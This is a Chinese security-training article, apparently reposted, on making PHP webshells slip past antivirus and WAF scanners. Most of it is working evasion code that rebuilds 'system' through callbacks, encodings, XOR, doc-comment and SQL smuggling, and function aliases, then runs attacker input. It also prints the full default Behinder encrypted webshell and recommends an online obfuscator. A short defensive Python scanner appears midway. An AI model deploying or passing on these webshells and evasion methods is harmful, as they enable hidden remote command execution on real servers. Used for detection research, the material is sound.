PHP免杀详细讲解

admin, 2024-10-28 13:41:36


This article was contributed by nn0nkey of 掌控安全学院.


Basics

Attacker-controllable inputs

  • $_GET

  • $_POST

  • $_COOKIE

  • $_REQUEST

  • $_SERVER, some of whose entries are attacker-controlled, such as REQUEST_METHOD, QUERY_STRING and HTTP_USER_AGENT

  • session_id(), a special case, but still usable

  • $_FILES

  • $GLOBALS

  • getallheaders()

  • get_defined_vars()

  • get_defined_functions()

filter_input

<?php
function abcsmytqqe($a){
    $class_name = json_decode('"' . $a . '"'); // JSON-unescape the GET value, so the payload can be sent encoded
    // __FUNCTION__ is "abcsmytqqe"; characters 3,5,3,6,9,4 spell "system", so no dangerous name appears literally
    ((__FUNCTION__)[3].(__FUNCTION__)[5].(__FUNCTION__)[3].(__FUNCTION__)[6].(__FUNCTION__)[9].(__FUNCTION__)[4])($class_name);
}
// FILTER_CALLBACK hands the value of ?b= to the function named in 'options'
$res=filter_input(INPUT_GET, 'b', FILTER_CALLBACK,array('options' => 'abcsmytqqe'));


Callback functions

There are a great many of these:

call_user_func()
array_filter()
array_walk()
array_map()
register_shutdown_function()
register_tick_function()
filter_var()
filter_var_array()
uasort()
uksort()
array_reduce()
array_walk_recursive()
call_user_func & call_user_func_array
<?php
call_user_func('system', 'whoami');
// equivalent to system('whoami')
<?php
call_user_func_array('system', array('whoami'));
array_map()

array_map() applies a user-supplied function to every value of an array and returns an array of the results.

Applied to command execution this becomes:

array_map('system', array('whoami'));
array_map($_GET['a'], array('whoami'));
array_map('system', array($_GET['a']));
array_walk&array_walk_recursive

These functions behave the same as array_map for our purposes.

The keyword can also be split by concatenation, because the callback is passed as a string:

<?php
$a=array("who"."ami");
array_walk_recursive($a,'sys'.'tem');
array_filter

array_filter — filters the elements of an array with a callback function

<?php
$a=array("who"."ami");
array_filter($a,'sys'.'tem');
iterator_apply

iterator_apply — calls a function for every element of an iterator

<?php
$it = new ArrayIterator(array(1,2,3));
iterator_apply($it, "system",array("whoami"));
?>
foreach()
<?php
$a=array("whoami");
$b="sys"."tem";
foreach($a as $value){
$b($value);
}

Dynamic concatenation like this, however, is easily detected.

String-manipulation functions

Odd little algorithms
<?php
function confusion($a){
    $s = ['A','a','b', 'y', 's', 's', 'T', 'e', 'a', 'm'];
    $tmp = "";
    while ($a > 10) {
        $tmp .= $s[$a % 10]; // the lowest decimal digit selects a letter
        $a = intdiv($a, 10); // integer division; the original $a/10 leaves a float, which PHP 8.1+ warns about when used as an array index
    }
    return $tmp.$s[$a];
}
confusion(976534)("whoami"); // confusion(976534) --> sysTem; function names are case-insensitive, so this calls system (dangerous function)

This one is taken from https://xz.aliyun.com/t/13591

<?php
function confusion($a){
    $tmp = "";

    // new algorithm: the argument is ignored and the name is rebuilt from an index table
    $characters = ['s', 'y', 's', 't', 'e', 'm'];
    $indices = [0, 1, 0, 3, 4, 5]; // positions of the letters of 'system' in $characters

    foreach ($indices as $index) {
        $tmp .= $characters[$index];
    }
    return $tmp;
}
// verify the result
echo confusion(976534); // prints 'system'
?>
String functions
trim()            // strips whitespace and other predefined characters from both ends of a string
ucfirst()         // uppercases the first character of a string
ucwords()         // uppercases the first character of each word
strtoupper()      // converts a string to uppercase
strtolower()      // converts a string to lowercase
strtr()           // translates specific characters in a string
substr_replace()  // replaces part of a string with another string
substr()          // returns part of a string

A bare $a() is flagged as a dynamic function call.

<?php
$a="system";
strtoupper($a)("whoami");

Wrapped this way, the scanner only sees strtoupper operating on a string; since PHP function names are case-insensitive, "SYSTEM" still resolves to system.

pack() & unpack()

pack() packs data into a binary string.

Demo: put simply, it turns numbers in the given encoding into a string.

<?php
// ASCII codes to "system"
echo pack("C6", 115, 121, 115, 116, 101, 109); // s, y, s, t, e, m
echo pack("H*", "73797374656d"); // the hex 73797374656d is the ASCII string "system"
?>

File-writing functions

Some people take a different route to evading webshell detection: the uploaded sample does nothing but write a malicious PHP file. Once it runs, the malicious PHP file lands in the chosen directory, and connecting to that file yields the webshell.

fwrite() & fputs()
<?php
highlight_file(__FILE__);
error_reporting(0);
$file = fopen("flag.txt", "w");
echo fwrite($file, "<?php phpinfo();"); // prints 16, the number of bytes written
fclose($file);

fputs() is an alias of fwrite() and can write files the same way.

file_put_contents()
<?php
highlight_file(__FILE__);
error_reporting(0);
$file = "flag.txt";
file_put_contents($file, "<?php phpinfo();"); // returns 16, the number of bytes written

With the FILE_APPEND flag the content is appended to the end of the file:

$file = 'sites.txt';
$site = "\nGoogle";
file_put_contents($file, $site, FILE_APPEND);

The function can also be combined with a decoding function to write the file, for example:

$datatest = "[base64 encoding of the file]"; // placeholder
file_put_contents('./[name of the file to write]', base64_decode($datatest)); // placeholder path
Exception-handling functions
__construct       // exception constructor
getMessage        // returns the exception message
getPrevious       // returns the previous exception in the chain, or null if there is none
getCode           // returns the exception code
getFile           // returns the name of the file in which the exception occurred
getLine           // returns the line number at which the exception occurred
getTrace          // returns the stack trace as an array
getTraceAsString  // returns the stack trace as a string
<?php
function check($a)
{
    if ($a != 1)
    {
        throw new Exception("sys"."tem"); // the function name travels inside the exception message
    }
    return true;
}
try
{
    check(8);
    // if an exception is thrown, the following text is not printed
    echo '如果输出该内容,说明 $number 变量小于1';
}
// catch the exception and call its message as a function
catch (Exception $e) {
    $e->getMessage()("wh"."oami");
}

PHP quirks

Numbers can take part in arithmetic with strings
<?php
$a="system";
1-$a("whoami")-2; // system() has already run by the time the subtraction is evaluated
?>
Variable variables
<?php
$a="aaa";
$$a="system"; // $aaa = "system"
$aaa("whoami");

Encoding-based bypasses

Base64 encoding
<?php
$f = base64_decode("c3lz__dG__Vt"); // decodes to system (dangerous function); non-strict base64_decode() skips the inserted underscores
$f($_POST[0]); // system($_POST[0]);
?>
ASCII encoding

ASCII codes are turned back into characters with chr().

<?php
$f = chr(115).chr(121).chr(115).chr(116).chr(101).chr(109); // system
$f($_POST['0']);
?>
ROT13 encoding
<?php
$f = str_rot13("flfgrz"); // decodes to system, a dangerous function
$f($_POST[0]); // system($_POST[0]);
?>
Hex encoding
<?php
$f = hex2bin("73797374656d"); // decodes to system, a dangerous function
$f($_POST[0]); // system($_POST[0]);
?>
Gz compression
<?php
// the literal is base64_encode(gzcompress("system")); decompressing it yields system, a dangerous function
$f = gzuncompress(base64_decode("eJwrriwuSc0FAAl0AqY="));
$f($_POST[0]); // system($_POST[0]);
?>
Combined encodings

Several encodings can be stacked to add complexity.

<?php
// hex-decode first, which gives the base64 string "c3lzdGVt", then base64-decode that to system, a dangerous function
$f = base64_decode(hex2bin("63336c7a64475674"));
$f($_POST[0]); // system($_POST[0]);
?>
Custom encoding
<?php
function custom_decode($str) {
    $encoded = str_replace(['a','d'], ['s', 'e'], $str); // a -> s, d -> e
    return $encoded;
}
$f = custom_decode("ayatdm"); // decodes to system, a dangerous function
echo $f;
?>
XOR
<?php
$a = ('.'^']').('$'^']').('.'^']').('4'^'@').('8'^']').(']'^'0'); // system, one character at a time
$b = ('.$.48]' ^ ']]]@]0'); // system, the whole string at once
echo $a;
echo $b;

Bypasses that read the string from somewhere else

ReflectionClass::getDocComment
<?php
/**
 * system($_GET[aabyss]);
 */
class User { }
$user = new ReflectionClass('User');
$comment = $user->getDocComment(); // the doc comment is returned verbatim, payload included
// offset 7 skips "/**\n * " and depends on the exact whitespace of the comment; 22 is the length of the statement
$f = substr($comment, 7, 22); // system($_GET[aabyss]);
eval($f);
Reading from a database
<?php
$path = "[path to the SQLite database file]"; // placeholder

$db = new PDO("sqlite:" . $path);

$sql_stmt = $db->prepare('select * from test where name="system"'); // the function name hides inside the SQL text
$sql_stmt->execute();

$f = substr($sql_stmt->queryString, -7, 6); // PDOStatement::$queryString holds the SQL exactly as prepared
$f($_GET['b']);
Reading a directory listing

FilesystemIterator is an iterator that yields information about every file in the target directory.

It does, however, require a specially named file to be present.

<?php
$fi = new FilesystemIterator(dirname(__FILE__));
$f = '';
foreach($fi as $i){
    $a = substr($i, 26, 6); // $i is the full path; offset 26 is the length of the directory prefix and depends on where the script lives
    if ($a == "system"){ // a file literally named "system" must exist next to the script
        $f = $a;
    }
}
$f("whoami");

Alias bypasses

PHP registers many functions under alias names (alias -> canonical function):

bzwrite->fwrite
bzflush->fflush
bzclose->fclose
isId->dom_attr_is_id
substringData->dom_characterdata_substring_data
appendData->dom_characterdata_append_data
insertData->dom_characterdata_insert_data
deleteData->dom_characterdata_delete_data
replaceData->dom_characterdata_replace_data
createElement->dom_document_create_element
createDocumentFragment->dom_document_create_document_fragment
createTextNode->dom_document_create_text_node
createComment->dom_document_create_comment
createCDATASection->dom_document_create_cdatasection
createProcessingInstruction->dom_document_create_processing_instruction
createAttribute->dom_document_create_attribute
createEntityReference->dom_document_create_entity_reference
getElementsByTagName->dom_document_get_elements_by_tag_name
importNode->dom_document_import_node
createElementNS->dom_document_create_element_ns
createAttributeNS->dom_document_create_attribute_ns
getElementsByTagNameNS->dom_document_get_elements_by_tag_name_ns
getElementById->dom_document_get_element_by_id
adoptNode->dom_document_adopt_node
normalizeDocument->dom_document_normalize_document
renameNode->dom_document_rename_node
save->dom_document_save
saveXML->dom_document_savexml
validate->dom_document_validate
xinclude->dom_document_xinclude
saveHTML->dom_document_save_html
saveHTMLFile->dom_document_save_html_file
schemaValidate->dom_document_schema_validate_file
schemaValidateSource->dom_document_schema_validate_xml
relaxNGValidate->dom_document_relaxNG_validate_file
relaxNGValidateSource->dom_document_relaxNG_validate_xml
setParameter->dom_domconfiguration_set_parameter
getParameter->dom_domconfiguration_get_parameter
canSetParameter->dom_domconfiguration_can_set_parameter
handleError->dom_domerrorhandler_handle_error
item->dom_domimplementationlist_item
getDomimplementation->dom_domimplementationsource_get_domimplementation
getDomimplementations->dom_domimplementationsource_get_domimplementations
item->dom_domstringlist_item
getAttribute->dom_element_get_attribute
setAttribute->dom_element_set_attribute
removeAttribute->dom_element_remove_attribute
getAttributeNode->dom_element_get_attribute_node
setAttributeNode->dom_element_set_attribute_node
removeAttributeNode->dom_element_remove_attribute_node
getElementsByTagName->dom_element_get_elements_by_tag_name
getAttributeNS->dom_element_get_attribute_ns
setAttributeNS->dom_element_set_attribute_ns
removeAttributeNS->dom_element_remove_attribute_ns
getAttributeNodeNS->dom_element_get_attribute_node_ns
setAttributeNodeNS->dom_element_set_attribute_node_ns
getElementsByTagNameNS->dom_element_get_elements_by_tag_name_ns
hasAttribute->dom_element_has_attribute
hasAttributeNS->dom_element_has_attribute_ns
setIdAttribute->dom_element_set_id_attribute
setIdAttributeNS->dom_element_set_id_attribute_ns
setIdAttributeNode->dom_element_set_id_attribute_node
getNamedItem->dom_namednodemap_get_named_item
setNamedItem->dom_namednodemap_set_named_item
removeNamedItem->dom_namednodemap_remove_named_item
item->dom_namednodemap_item
getNamedItemNS->dom_namednodemap_get_named_item_ns
setNamedItemNS->dom_namednodemap_set_named_item_ns
removeNamedItemNS->dom_namednodemap_remove_named_item_ns
count->dom_namednodemap_count
getName->dom_namelist_get_name
getNamespaceURI->dom_namelist_get_namespace_uri
insertBefore->dom_node_insert_before
replaceChild->dom_node_replace_child
removeChild->dom_node_remove_child
appendChild->dom_node_append_child
hasChildNodes->dom_node_has_child_nodes
cloneNode->dom_node_clone_node
normalize->dom_node_normalize
isSupported->dom_node_is_supported
hasAttributes->dom_node_has_attributes
compareDocumentPosition->dom_node_compare_document_position
isSameNode->dom_node_is_same_node
lookupPrefix->dom_node_lookup_prefix
isDefaultNamespace->dom_node_is_default_namespace
lookupNamespaceUri->dom_node_lookup_namespace_uri
isEqualNode->dom_node_is_equal_node
getFeature->dom_node_get_feature
setUserData->dom_node_set_user_data
getUserData->dom_node_get_user_data
item->dom_nodelist_item
count->dom_nodelist_count
findOffset16->dom_string_extend_find_offset16
findOffset32->dom_string_extend_find_offset32
splitText->dom_text_split_text
isWhitespaceInElementContent->dom_text_is_whitespace_in_element_content
isElementContentWhitespace->dom_text_is_whitespace_in_element_content
replaceWholeText->dom_text_replace_whole_text
handle->dom_userdatahandler_handle
registerNamespace->dom_xpath_register_ns
query->dom_xpath_query
evaluate->dom_xpath_evaluate
registerPhpFunctions->dom_xpath_register_php_functions
ftp_quit->ftp_close
imap_header->imap_headerinfo
imap_listmailbox->imap_list
imap_getmailboxes->imap_list_full
imap_scanmailbox->imap_listscan
imap_listsubscribed->imap_lsub
imap_getsubscribed->imap_lsub_full
imap_fetchtext->imap_body
imap_scan->imap_listscan
imap_create->imap_createmailbox
imap_rename->imap_renamemailbox
ldap_close->ldap_unbind
ldap_get_values->ldap_get_values_len
ldap_modify->ldap_mod_replace
mysqli_execute->mysqli_stmt_execute
mysqli_escape_string->mysqli_real_escape_string
mysqli_set_opt->mysqli_options
autocommit->mysqli_autocommit
begin_transaction->mysqli_begin_transaction
change_user->mysqli_change_user
character_set_name->mysqli_character_set_name
close->mysqli_close
commit->mysqli_commit
connect->mysqli_connect
dump_debug_info->mysqli_dump_debug_info
debug->mysqli_debug
get_charset->mysqli_get_charset
get_client_info->mysqli_get_client_info
get_connection_stats->mysqli_get_connection_stats
get_server_info->mysqli_get_server_info
get_warnings->mysqli_get_warnings
init->mysqli_init_method
kill->mysqli_kill
multi_query->mysqli_multi_query
construct->mysqli_link_construct
more_results->mysqli_more_results
next_result->mysqli_next_result
options->mysqli_options
ping->mysqli_ping
prepare->mysqli_prepare
query->mysqli_query
real_connect->mysqli_real_connect
real_escape_string->mysqli_real_escape_string
escape_string->mysqli_real_escape_string
real_query->mysqli_real_query
release_savepoint->mysqli_release_savepoint
rollback->mysqli_rollback
savepoint->mysqli_savepoint
select_db->mysqli_select_db
set_charset->mysqli_set_charset
set_opt->mysqli_options
ssl_set->mysqli_ssl_set
stat->mysqli_stat
stmt_init->mysqli_stmt_init
store_result->mysqli_store_result
thread_safe->mysqli_thread_safe
use_result->mysqli_use_result
refresh->mysqli_refresh
construct->mysqli_result_construct
close->mysqli_free_result
free->mysqli_free_result
data_seek->mysqli_data_seek
fetch_field->mysqli_fetch_field
fetch_fields->mysqli_fetch_fields
fetch_field_direct->mysqli_fetch_field_direct
fetch_all->mysqli_fetch_all
fetch_array->mysqli_fetch_array
fetch_assoc->mysqli_fetch_assoc
fetch_object->mysqli_fetch_object
fetch_row->mysqli_fetch_row
field_seek->mysqli_field_seek
free_result->mysqli_free_result
construct->mysqli_stmt_construct
attr_get->mysqli_stmt_attr_get
attr_set->mysqli_stmt_attr_set
bind_param->mysqli_stmt_bind_param
bind_result->mysqli_stmt_bind_result
close->mysqli_stmt_close
data_seek->mysqli_stmt_data_seek
execute->mysqli_stmt_execute
fetch->mysqli_stmt_fetch
get_warnings->mysqli_stmt_get_warnings
result_metadata->mysqli_stmt_result_metadata
more_results->mysqli_stmt_more_results
next_result->mysqli_stmt_next_result
num_rows->mysqli_stmt_num_rows
send_long_data->mysqli_stmt_send_long_data
free_result->mysqli_stmt_free_result
reset->mysqli_stmt_reset
prepare->mysqli_stmt_prepare
store_result->mysqli_stmt_store_result
get_result->mysqli_stmt_get_result
oci_free_cursor->oci_free_statement
ocifreecursor->oci_free_statement
ocibindbyname->oci_bind_by_name
ocidefinebyname->oci_define_by_name
ocicolumnisnull->oci_field_is_null
ocicolumnname->oci_field_name
ocicolumnsize->oci_field_size
ocicolumnscale->oci_field_scale
ocicolumnprecision->oci_field_precision
ocicolumntype->oci_field_type
ocicolumntyperaw->oci_field_type_raw
ociexecute->oci_execute
ocicancel->oci_cancel
ocifetch->oci_fetch
ocifetchstatement->oci_fetch_all
ocifreestatement->oci_free_statement
ociinternaldebug->oci_internal_debug
ocinumcols->oci_num_fields
ociparse->oci_parse
ocinewcursor->oci_new_cursor
ociresult->oci_result
ociserverversion->oci_server_version
ocistatementtype->oci_statement_type
ocirowcount->oci_num_rows
ocilogoff->oci_close
ocilogon->oci_connect
ocinlogon->oci_new_connect
ociplogon->oci_pconnect
ocierror->oci_error
ocifreedesc->oci_free_descriptor
ocisavelob->oci_lob_save
ocisavelobfile->oci_lob_import
ociwritelobtofile->oci_lob_export
ociloadlob->oci_lob_load
ocicommit->oci_commit
ocirollback->oci_rollback
ocinewdescriptor->oci_new_descriptor
ocisetprefetch->oci_set_prefetch
ocipasswordchange->oci_password_change
ocifreecollection->oci_free_collection
ocinewcollection->oci_new_collection
ocicollappend->oci_collection_append
ocicollgetelem->oci_collection_element_get
ocicollassignelem->oci_collection_element_assign
ocicollsize->oci_collection_size
ocicollmax->oci_collection_max
ocicolltrim->oci_collection_trim
load->oci_lob_load
tell->oci_lob_tell
truncate->oci_lob_truncate
erase->oci_lob_erase
flush->oci_lob_flush
setbuffering->ocisetbufferinglob
getbuffering->ocigetbufferinglob
rewind->oci_lob_rewind
read->oci_lob_read
eof->oci_lob_eof
seek->oci_lob_seek
write->oci_lob_write
append->oci_lob_append
size->oci_lob_size
writetofile->oci_lob_export
export->oci_lob_export
import->oci_lob_import
writetemporary->oci_lob_write_temporary
close->oci_lob_close
save->oci_lob_save
savefile->oci_lob_import
free->oci_free_descriptor
append->oci_collection_append
getelem->oci_collection_element_get
assignelem->oci_collection_element_assign
assign->oci_collection_assign
size->oci_collection_size
max->oci_collection_max
trim->oci_collection_trim
free->oci_free_collection
odbc_do->odbc_exec
odbc_field_precision->odbc_field_len
openssl_free_key->openssl_pkey_free
openssl_get_privatekey->openssl_pkey_get_private
openssl_get_publickey->openssl_pkey_get_public
pcntl_errno->pcntl_get_last_error
pg_exec->pg_query
pg_getlastoid->pg_last_oid
pg_cmdtuples->pg_affected_rows
pg_errormessage->pg_last_error
pg_numrows->pg_num_rows
pg_numfields->pg_num_fields
pg_fieldname->pg_field_name
pg_fieldsize->pg_field_size
pg_fieldtype->pg_field_type
pg_fieldnum->pg_field_num
pg_fieldprtlen->pg_field_prtlen
pg_fieldisnull->pg_field_is_null
pg_freeresult->pg_free_result
pg_result->pg_fetch_result
pg_loreadall->pg_lo_read_all
pg_locreate->pg_lo_create
pg_lounlink->pg_lo_unlink
pg_loopen->pg_lo_open
pg_loclose->pg_lo_close
pg_loread->pg_lo_read
pg_lowrite->pg_lo_write
pg_loimport->pg_lo_import
pg_loexport->pg_lo_export
pg_clientencoding->pg_client_encoding
pg_setclientencoding->pg_set_client_encoding
posix_errno->posix_get_last_error
session_commit->session_write_close
snmpwalkoid->snmprealwalk
snmp_set_oid_numeric_print->snmp_set_oid_output_format
socket_getopt->socket_get_option
socket_setopt->socket_set_option
sodium_crypto_scalarmult_base->sodium_crypto_box_publickey_from_secretkey
join->implode
chop->rtrim
strchr->strstr
srand->mt_srand
getrandmax->mt_getrandmax
show_source->highlight_file
ini_alter->ini_set
checkdnsrr->dns_check_record
getmxrr->dns_get_mx
doubleval->floatval
is_integer->is_int
is_long->is_int
is_double->is_float
fputs->fwrite
set_file_buffer->stream_set_write_buffer
socket_set_blocking->stream_set_blocking
stream_register_wrapper->stream_wrapper_register
socket_set_timeout->stream_set_timeout
dir->getdir
is_writeable->is_writable
diskfreespace->disk_free_space
pos->current
sizeof->count
key_exists->array_key_exists
close->closedir
rewind->rewinddir
importStylesheet->xsl_xsltprocessor_import_stylesheet
transformToDoc->xsl_xsltprocessor_transform_to_doc
transformToUri->xsl_xsltprocessor_transform_to_uri
transformToXml->xsl_xsltprocessor_transform_to_xml
setParameter->xsl_xsltprocessor_set_parameter
getParameter->xsl_xsltprocessor_get_parameter
removeParameter->xsl_xsltprocessor_remove_parameter
hasExsltSupport->xsl_xsltprocessor_has_exslt_support
registerPHPFunctions->xsl_xsltprocessor_register_php_functions
setProfiling->xsl_xsltprocessor_set_profiling
setSecurityPrefs->xsl_xsltprocessor_set_security_prefs
getSecurityPrefs->xsl_xsltprocessor_get_security_prefs
gzrewind->rewind
gzclose->fclose
gzeof->feof
gzgetc->fgetc
gzgets->fgets
gzgetss->fgetss
gzread->fread
gzpassthru->fpassthru
gzseek->fseek
gztell->ftell
gzwrite->fwrite
gzputs->fwrite
getallheaders->apache_request_headers
getallheaders->litespeed_request_headers
apache_request_headers->litespeed_request_headers
apache_response_headers->litespeed_response_headers

In that list we find a usable function, mbereg_replace, an alias of mb_ereg_replace. mb_ereg_replace resembles preg_replace in that its 'e' mode implicitly executes code, but mb_ereg_replace itself does not escape the scanners, whereas mbereg_replace is ALLKILL: a single missing underscore is all it takes to slip past them.

<?php
// (ALLKILL)
error_reporting(0);
mbereg_replace('.*', '', $_REQUEST[2333], 'mer'); // works on PHP 5 and PHP 7; the alias was removed in PHP 8.0
?>

We can also create aliases of our own, for example:

<?php
// PHP >= 5.6; gets past 盾狗
use function system as strlen; // combined with a file inclusion this could even hijack calls; left for you to develop
strlen($_POST[1]);
<?php
// (ALLKILL)
define("ARRAY2", "sys"."tem");
@constant("ARRAY2")(pos(pos($GLOBALS))); // PHP >= 7; pos($GLOBALS) is the first superglobal (typically $_GET) and pos() of that its first value
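
A defender-side counterpart to the tricks catalogued above (the callback, string-building, encoding and alias sections), added here as an example and not taken from the original article or any product: a small Python constant-folder that evaluates the literal-only decoder chains (concatenation, chr(), hex2bin(), base64_decode() with its lenient alphabet handling, str_rot13(), gzuncompress(), pack(), string XOR, case changes) and then compares the folded literals, direct call names and `use function ... as` imports against a sink list. It tracks no variables and does not model the `__FUNCTION__` indexing trick; the sink list and the sample inputs are constructed from the snippets shown above.

```python
"""Constant-fold the literal-only tricks this article uses to hide a dangerous
function name, then match the folded strings against a sink list. Added example,
not code from the original post; it tracks literals only, never variables."""
import base64
import codecs
import re
import zlib

SINKS = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open", "eval",
         "assert", "mb_ereg_replace", "mbereg_replace", "preg_replace"}
# Folded literals are stored out of band and referenced in the source as \x00N\x00,
# so later rules never have to cope with quotes or binary bytes inside them.
TOK = r"\x00(\d+)\x00"
QUOTED = r"'((?:[^'\\]|\\.)*)'|\"((?:[^\"\\]|\\.)*)\""


def _b64_lenient(s):
    # PHP's non-strict base64_decode() drops characters outside the alphabet,
    # which is what lets "c3lz__dG__Vt" decode to "system".
    s = re.sub(r"[^A-Za-z0-9+/]", "", s)
    return base64.b64decode(s + "=" * (-len(s) % 4)).decode("latin-1")


# Single-argument decoders seen in the article, each mapping str -> str.
UNARY = {
    "hex2bin": lambda s: bytes.fromhex(s).decode("latin-1"),
    "base64_decode": _b64_lenient,
    "str_rot13": lambda s: codecs.encode(s, "rot_13"),
    "gzuncompress": lambda s: zlib.decompress(s.encode("latin-1")).decode("latin-1"),
    "strtoupper": str.upper, "strtolower": str.lower,
    "strrev": lambda s: s[::-1], "trim": str.strip,
}


def fold(src):
    """Replace decoder calls over literals by their results until nothing changes."""
    lits = []

    def tok(value):
        lits.append(value)
        return f"\x00{len(lits) - 1}\x00"

    def val(idx):
        return lits[int(idx)]

    def quoted(m):
        if m.group(1) is not None:  # single-quoted: only \' and \\ are escapes
            return tok(m.group(1).replace("\\'", "'").replace("\\\\", "\\"))
        raw = re.sub(r"\\x([0-9A-Fa-f]{2})", lambda h: chr(int(h.group(1), 16)), m.group(2))
        return tok(raw.replace("\\n", "\n").replace('\\"', '"').replace("\\\\", "\\"))

    def pack(m):  # pack("C6", 115, ...) and pack("H*", "7379...") as in the article
        fmt, args = val(m.group(1)), m.group(2).strip()
        if fmt.startswith("C"):
            return tok("".join(chr(int(n) % 256) for n in re.findall(r"\d+", args)))
        hexarg = re.fullmatch(TOK, args)
        if fmt == "H*" and hexarg:
            return tok(bytes.fromhex(val(hexarg.group(1))).decode("latin-1"))
        return m.group(0)

    src = re.sub(QUOTED, quoted, src)
    rules = [
        (r"\bchr\s*\(\s*(\d+)\s*\)", lambda m: tok(chr(int(m.group(1)) % 256))),
        (rf"{TOK}\s*\.\s*{TOK}", lambda m: tok(val(m.group(1)) + val(m.group(2)))),
        (rf"{TOK}\s*\^\s*{TOK}", lambda m: tok("".join(  # PHP string XOR is bytewise
            chr(ord(x) ^ ord(y)) for x, y in zip(val(m.group(1)), val(m.group(2)))))),
        (rf"\b({'|'.join(UNARY)})\s*\(\s*{TOK}\s*\)",
         lambda m: tok(UNARY[m.group(1)](val(m.group(2))))),
        (rf"\bpack\s*\(\s*{TOK}\s*,([^()]*)\)", pack),
        (rf"(?<![\w$])\(\s*{TOK}\s*\)", lambda m: f"\x00{m.group(1)}\x00"),  # ('lit') -> lit
    ]
    while True:
        before = src
        for pattern, repl in rules:
            src = re.sub(pattern, repl, src)
        if src == before:
            return src, lits


def scan(src):
    """Sink names reached as a direct call (mbereg_replace(...), eval(...)), through
    `use function X as Y`, or as a folded literal; compared in lower case because
    PHP function names are case-insensitive."""
    folded, lits = fold(src)
    names = {n.lower() for n in re.findall(r"\b([A-Za-z_]\w*)\s*\(", folded)}
    names |= {n.lower() for n in re.findall(r"\buse\s+function\s+\\?([A-Za-z_]\w*)\s+as\b", folded)}
    names |= {v.lower() for v in lits}
    return sorted(names & SINKS)


# Constructed inputs, assembled from the article's snippets.
SAMPLES = {
    "concat_chr": "array_walk_recursive($a, 'sys'.'tem'); $f = chr(115).chr(121).chr(115).chr(116).chr(101).chr(109);",
    "b64_rot13_hex": '$f = base64_decode("c3lz__dG__Vt"); $g = str_rot13("flfgrz"); $h = hex2bin("73797374656d");',
    "gz_combo": '$f = gzuncompress(base64_decode("eJwrriwuSc0FAAl0AqY=")); $g = base64_decode(hex2bin("63336c7a64475674"));',
    "xor": "$a = ('.'^']').('$'^']').('.'^']').('4'^'@').('8'^']').(']'^'0'); $b = ('.$.48]' ^ ']]]@]0');",
    "pack": 'echo pack("C6", 115, 121, 115, 116, 101, 109); echo pack("H*", "73797374656d");',
    "upper_exception": 'strtoupper("sys"."tem")("whoami"); throw new Exception("sys"."tem");',
    "alias": "use function system as strlen; strlen($_POST[1]);",
    "mbereg": "mbereg_replace('.*', '', $_REQUEST[2333], 'mer');",
    "benign": "echo strtoupper('hello') . str_rot13('uryyb');",
}
```

Call scan() on a file's contents; every encoded example on this page folds back to the string system, while the benign sample stays clean. A production scanner would work on the PHP tokenizer's output rather than regexes and add data-flow for variables, but the folding step is the part that defeats the encoding layer.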

Obfuscation

Recommended site

https://enphp.djunny.com/

Upload your shell and run it through the obfuscator.

Original code

<?php
// the default Behinder (冰蝎) PHP shell: AES-128 encrypted input, evaluated through __invoke
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; // the key is the first 16 characters of the 32-character MD5 of the connection password; the default password is rebeyond
$_SESSION['k']=$key;
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
    // no OpenSSL: fall back to base64 plus a rolling XOR with the key
    $t="base64_"."decode";
    $post=$t($post."");

    for($i=0;$i<strlen($post);$i++) {
        $post[$i] = $post[$i]^$key[$i+1&15];
    }
}
else
{
    $post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>

After obfuscation

<?php
/*
-- EnPHP v2: http://enphp.djunny.com/
*/
[The rest of the EnPHP output is one line of goto-based control-flow flattening with non-ASCII variable and label names, strings recovered through base64_decode()/parse_str() lookups and hex escapes; the identifiers were mangled in extraction and are not reproduced here. Its recognisable anchors are the class C { public function __invoke(...) { eval(...); } } definition and the closing @call_user_func(new C(), ...) call.]

Statement: the content shared by this official account is intended solely for discussion of network-security techniques and must not be used for illegal purposes.

All penetration testing requires authorization; violators bear the consequences themselves, and the account and author are not responsible. Please remember to stay within the law.


This article first appeared on the WeChat official account 掌控安全EDU: PHP免杀详细讲解

Archived at CN-SEC: https://cn-sec.com/archives/3318115.html